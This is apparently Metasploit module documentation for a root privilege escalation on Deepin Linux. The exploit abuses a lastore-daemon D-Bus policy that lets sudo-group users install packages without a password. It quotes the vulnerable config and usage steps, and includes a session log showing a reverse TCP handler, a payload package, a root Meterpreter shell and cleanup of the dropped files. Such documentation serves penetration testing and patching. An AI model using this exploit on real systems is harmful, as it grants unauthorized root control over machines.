## Description

  This module attempts to gain root privileges on [Deepin Linux](https://www.deepin.org/en/) systems
  by using `lastore-daemon` to install a package. It may cause audio and/or graphical signals confirming
  the installation of the payload package.


## Vulnerable Application

  The `lastore-daemon` D-Bus configuration on Deepin Linux permits any
  user in the `sudo` group to install arbitrary system packages without
  providing a password, resulting in code execution as root. By default,
  the first user created on the system is a member of the `sudo` group.

  The D-Bus configuration in `/usr/share/dbus-1/system.d/com.deepin.lastore.conf`
  permits users of the `sudo` group to execute arbitrary methods on the
  `com.deepin.lastore` interface, as shown below:

  ```xml
  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.deepin.lastore"/>
    <allow send_destination="com.deepin.lastore"/>
  </policy>

  <!-- Allow sudo group to invoke methods on the interfaces -->
  <policy group="sudo">
    <allow own="com.deepin.lastore"/>
    <allow send_destination="com.deepin.lastore"/>
  </policy>
  ```

  This module has been tested successfully with lastore-daemon versions:

  * 0.9.53-1 on Deepin Linux 15.5 (x64)
  * 0.9.66-1 on Deepin Linux 15.7 (x64)

  Deepin Linux is available here:

  * https://www.deepin.org/en/mirrors/releases/

  `lastore-daemon` source repository is available here:

  * https://cr.deepin.io/#/admin/projects/lastore/lastore-daemon
  * https://github.com/linuxdeepin/lastore-daemon/


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/lastore_daemon_dbus_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

### SESSION

  Which session to use, which can be viewed with `sessions`

### WritableDir

  A writable directory file system path. (default: `/tmp`)


## Scenarios

```
  msf > use exploit/linux/local/lastore_daemon_dbus_priv_esc 
  msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/lastore_daemon_dbus_priv_esc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Building package...
  [*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/control' (98 bytes) ...
  [*] Writing '/tmp/.NNhJWRPZdd/DEBIAN/postinst' (28 bytes) ...
  [*] Uploading payload...
  [*] Writing '/tmp/.1sZZ46ozIH' (207 bytes) ...
  [*] Installing package...
  [*] Sending stage (857352 bytes) to 172.16.191.200
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.200:51464) at 2018-03-24 18:45:29 -0400
  [+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/control
  [+] Deleted /tmp/.NNhJWRPZdd/DEBIAN/postinst
  [+] Deleted /tmp/.1sZZ46ozIH
  [+] Deleted /tmp/.NNhJWRPZdd/DEBIAN
  [*] Removing package...

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.200
  OS           : Deepin 15.5 (Linux 4.9.0-deepin13-amd64)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  ```

